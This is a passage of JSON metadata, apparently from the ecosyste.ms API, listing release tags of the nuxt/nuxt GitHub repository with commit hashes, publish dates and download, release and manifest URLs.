api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e116